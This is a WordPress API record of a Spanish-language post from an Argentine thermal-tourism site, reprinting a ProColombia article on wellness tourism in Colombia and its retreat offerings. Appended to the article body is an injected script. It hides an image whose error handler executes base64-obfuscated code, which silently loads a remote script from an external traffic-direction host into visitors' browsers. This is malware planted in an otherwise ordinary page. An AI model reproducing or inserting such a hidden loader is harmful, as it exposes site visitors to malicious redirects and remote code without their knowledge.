{"id":4487,"date":"2021-06-30T23:29:06","date_gmt":"2021-07-01T02:29:06","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=4487"},"modified":"2025-08-13T16:30:47","modified_gmt":"2025-08-13T19:30:47","slug":"turismo-de-bienestar-una-oportunidad-para-reactivar-la-industria-de-viajes-en-colombia","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=4487","title":{"rendered":"Turismo de bienestar, una oportunidad para reactivar la industria de viajes en Colombia"},"content":{"rendered":"\n<p class=\"has-text-align-right\">Fuente: <strong><a href=\"https:\/\/procolombia.co\/noticias\/turismo-de-bienestar-una-oportunidad-para-reactivar-la-industria-de-viajes\" target=\"_blank\" rel=\"noreferrer noopener\">ProColombia<\/a><\/strong><\/p>\n\n\n\n<p><strong>Este segmento se impone como tendencia del turismo a nivel mundial. ProColombia cuenta el potencial que tiene el pa\u00eds para ofrecer este tipo de experiencias que conecten a los viajeros con la naturaleza y la cultura.<\/strong><\/p>\n\n\n\n<p>Hoy la demanda por actividades tur\u00edsticas relacionadas con el bienestar ha incrementado. As\u00ed lo indican diferentes organismos especializados en turismo a nivel mundial con el argumento de que la pandemia cambi\u00f3 los intereses de los viajeros.<\/p>\n\n\n\n<p>La Adventure Travel Trade Association (ATTA), por ejemplo, hizo un estudio a finales de 2020 en el que concluy\u00f3 que el turismo de bienestar es una de las diez experiencias de mayor tendencia con otras actividades como trekking, cultura, gastronom\u00eda, expediciones y ciclismo y, adem\u00e1s, indic\u00f3 que en Suram\u00e9rica este segmento es la quinta experiencia m\u00e1s demandada.<\/p>\n\n\n\n<p>Por su parte, la Organizaci\u00f3n Mundial del Turismo define a este segmento como una&nbsp;actividad tur\u00edstica que aspira a mejorar y equilibrar los \u00e1mbitos principales de la vida humana, entre ellos el f\u00edsico, el mental, el emocional, el ocupacional, el intelectual y el espiritual y, en este sentido, Colombia se convierte en el destino ideal para este tipo de experiencias, pues durante los \u00faltimos a\u00f1os ha fortalecido su oferta, la cual, adem\u00e1s, se ha preparado ante las nuevas tendencias resultado de la pandemia.<\/p>\n\n\n\n<p>Este tipo de actividades est\u00e1n acordes a la actualidad, pues de acuerdo con la firma estadounidense&nbsp;Dynata, la pandemia trajo una mayor preocupaci\u00f3n por la salud mental. Seg\u00fan la empresa, cuatro de cada diez consumidores encuestados informaron un incremento de la ansiedad o estr\u00e9s durante la pandemia, por lo que los viajes podr\u00edan ser una forma de reducir este impacto negativo, dando tambi\u00e9n una oportunidad a los productos de relajaci\u00f3n y bienestar.<\/p>\n\n\n\n<p>Ante este inter\u00e9s creciente, se suma una gran proyecci\u00f3n econ\u00f3mica. De acuerdo con el Global Wellness Institute, las actividades de bienestar a nivel mundial mueven cifras por alrededor de US$3,5 billones, de los cuales US$639 millones pertenecen al turismo, siendo uno de los segmentos que m\u00e1s generan activos luego de las categor\u00edas de cuidado personal, actividad f\u00edsica y nutrici\u00f3n. La misma organizaci\u00f3n internacional prev\u00e9 que para 2022&nbsp;esta industria alcanzar\u00e1 los US$919 billones en ganancias.<\/p>\n\n\n\n<p class=\"has-text-align-center has-white-color has-vivid-cyan-blue-background-color has-text-color has-background\">\u201dNuestra ubicaci\u00f3n geogr\u00e1fica y las seis regiones que componen nuestro territorio nos hacen un destino ideal para que viajeros de todo el mundo vivan experiencias de bienestar \u00fanicas que solo se encuentran en nuestros destinos. Adem\u00e1s, este tipo de actividades est\u00e1n acorde a las tendencias producto de la coyuntura. Hoy podemos decir que el turismo de bienestar se convierte en un segmento clave para la promoci\u00f3n de Colombia como destino tur\u00edstico, lo que sin duda aportar\u00e1 a la reactivaci\u00f3n de la industria\u201d, explic\u00f3 Flavia Santoro, presidenta de ProColombia.<\/p>\n\n\n\n<p>Por su parte, Ostelea, la escuela de management de turismo en Espa\u00f1a, indic\u00f3 recientemente que: \u201csi el inter\u00e9s por experiencias y destinos vinculados con la salud y el bienestar era ya significativo, la actual pandemia producida por el Covid-19 aleja las dudas sobre la importancia que tiene la salud de las personas, no s\u00f3lo a nivel individual o familiar, sino tambi\u00e9n para el buen funcionamiento de la econom\u00eda y la sociedad en su conjunto\u201d. Lo anterior lo confirma<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong><span style=\"color:#0693e3\" class=\"tadv-color\">\u00bfCu\u00e1l es la oferta en Colombia?<\/span><\/strong><\/h2>\n\n\n\n<p>De acuerdo con ProColombia, se han identificado estos nichos en el producto de turismo de bienestar: centros de bienestar, spas, termales, tradiciones ancestrales, retiros espirituales y viajes conscientes. Es as\u00ed como en el pa\u00eds existen operadores y agencias de viajes especializadas en este segmento, las cuales han preparado una oferta diferente aprovechando la gran diversidad natural y la historia cultural (tradiciones ancestrales)del pa\u00eds. Estos son algunas de las experiencias transformadoras que existen en Colombia:<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong><span style=\"color:#0693e3\" class=\"tadv-color\">Viaje de conexi\u00f3n con la selva<\/span><\/strong><\/h2>\n\n\n\n<p>Este es un viaje que se hace a los Cerros de Mavecure, ubicados en Guain\u00eda, en donde durante cinco d\u00edas los viajeros se conectan con la energ\u00eda poderosa de estos majestuosos monolitos haciendo senderismo por sitios hist\u00f3ricos, religiosos y m\u00edticos. Durante el viaje, se hacen recorridos por las aguas de diferentes r\u00edos, que var\u00edan de colores que van del azul profundo al negro intenso en donde, adem\u00e1s, existe la oportunidad de acampar a sus orillas. Tambi\u00e9n las comunidades ind\u00edgenas hacen parte activa de las experiencias, quienes comparten su sabidur\u00eda ancestral para ayudar a sanar.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong><span style=\"color:#0693e3\" class=\"tadv-color\"><span style=\"background-color:#ffffff\" class=\"tadv-background-color\">Sanaci\u00f3n con ballenas<\/span><\/span><\/strong><\/h2>\n\n\n\n<p>Esta experiencia se puede hacer en frente de las costas del Choc\u00f3, regi\u00f3n de vastas selvas, cascadas, aguas termales y playas paradisiacas. Es el espacio sagrado en donde cada a\u00f1o, de julio a octubre, llegan las ballenas jorobadas para hacer su danza de amor para dar luz a sus ballenatos. Los viajeros tiene la oportunidad de entrar a las aguas pac\u00edficas y conectarse a trav\u00e9s de la meditaci\u00f3n con la energ\u00eda de estos majestuosos animales. Adem\u00e1s, a este viaje tambi\u00e9n se puede sumar una experiencia en el Paisaje Cultural Cafetero, espec\u00edficamente en la zona cafetera de Quimbaya.<\/p>\n\n\n\n<h2 class=\"has-vivid-cyan-blue-color has-text-color wp-block-heading\"><strong>Sanando con el agua y los cristales<\/strong><\/h2>\n\n\n\n<p>Muy cerca al municipio de La Macarena, en el Meta, se encuentra Ca\u00f1o Cristales conocido como el r\u00edo de los cinco colores. All\u00ed existen experiencias como talleres, meditaciones guiadas y otras actividades para que los viajeros dejen a un lado sus dolencias f\u00edsicas y emocionales y despierten la conciencia y el renacer. El prop\u00f3sito es que, con los colores del agua y la sanaci\u00f3n cu\u00e1ntica, se haga una limpieza de chakras y se trabaje con cristales para aumentar la luz interior.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong><span style=\"color:#0693e3\" class=\"tadv-color\">El encuentro de tres mundos<\/span><\/strong><\/h2>\n\n\n\n<p>En los territorios de Boyac\u00e1 vivieron los Muiscas, los m\u00e1s aguerridos guerreros, defensores de sus tierras y de su comunidad. Ellos, ancestros de los campesinos, dejaron un legado de cultura, artesan\u00eda y amor por cultivar la tierra. Y esta es precisamente la experiencia que se busca vivir a trav\u00e9s de un recorrido de por el altiplano cundiboyacense para descubrir un territorio ancestral que guarda tradiciones de ind\u00edgenas y campesinos. El objetivo es vivir la esencia de su cultura, artesan\u00edas, alimentaci\u00f3n y conexi\u00f3n con la tierra.<\/p>\n\n\n\n<h2 class=\"has-vivid-cyan-blue-color has-text-color wp-block-heading\"><strong>Sabidur\u00eda ancestral en La Guajira<\/strong><\/h2>\n\n\n\n<p>Este viaje consiste en visitar el Pil\u00f3n de Az\u00facar, una peque\u00f1a monta\u00f1a con miras hacia el mar y que se ubica a tres horas al norte de Riohacha, en el Cabo de La Vela. Este es un lugar sagrado que sirvi\u00f3 de gu\u00eda a los primeros pobladores que navegaban perdidos por las aguas del mar Caribe. Esa cima es adorada por los ind\u00edgenas Wayuu en su lengua en wayuunaiki le llamaron Kamaici, que significa \u201cse\u00f1or de las cosas del mar\u201d. El viaje se complementa con la visita hacia otros puntos sagrados de La Guajira, en donde los viajeros se pueden conectar con los elementales de la naturaleza de la siguiente manera: mental-tierra, f\u00edsica-aire, emocional-agua y espiritual-fuego.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Fuente: ProColombia Este segmento se impone como tendencia del turismo a nivel mundial. ProColombia cuenta el potencial que tiene el pa\u00eds para ofrecer este tipo de experiencias que conecten a los viajeros con la naturaleza y la cultura. Hoy la demanda por actividades tur\u00edsticas relacionadas con el bienestar ha incrementado. As\u00ed lo indican diferentes organismos [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":4490,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[12,28,30,15],"tags":[],"class_list":["post-4487","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-internacionales","category-portales-de-servicios-e-informacion","category-temas-relacionados","category-turismo-de-bienestar"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4487","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4487"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4487\/revisions"}],"predecessor-version":[{"id":10817,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4487\/revisions\/10817"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4490"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4487"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4487"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4487"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}